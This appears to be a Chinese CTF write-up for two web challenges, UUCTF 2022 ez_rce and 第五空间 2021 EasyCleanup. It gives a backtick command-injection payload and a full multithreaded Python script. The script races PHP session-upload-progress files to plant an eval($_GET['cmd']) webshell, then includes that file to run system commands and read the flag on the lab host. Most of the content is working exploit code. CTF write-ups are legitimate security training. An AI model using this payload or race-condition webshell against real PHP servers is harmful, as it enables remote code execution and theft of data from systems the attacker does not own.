1、[UUCTF 2022 新生赛]ez_rce
所以构造payload code=printf(`l\s /`);会发现一个目录ffffffff??????? 再构造得到flag
2、[第五空间 2021]EasyCleanup
审计代码,一顿乱分析,发现PHPinfo看到session临时文件上传
ok上脚本
import io
import requests
import threading
from cffi.backend_ctypes import xrange
sessid = '0'
def write(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = session.post( 'http://node4.anna.nssctf.cn:28335/', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_GET["cmd"]);?>'}, files={'file': ('tgao.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
while True:
resp = session.post(f"http://node4.anna.nssctf.cn:28335/?mode=foo&file=/tmp/sess_{sessid}&cmd=system('cd /;ls;cat nssctfasdasdflag');")
if 'tgao.txt' in resp.text:
print(resp.text)
event.clear()
else:
print("[+++++++++++++]retry")
#print(resp.text)
if __name__=="__main__":
event=threading.Event()
with requests.session() as session:
for i in xrange(1,30):
threading.Thread(target=write,args=(session,)).start()
for i in xrange(1,30):
threading.Thread(target=read,args=(session,)).start()
event.set()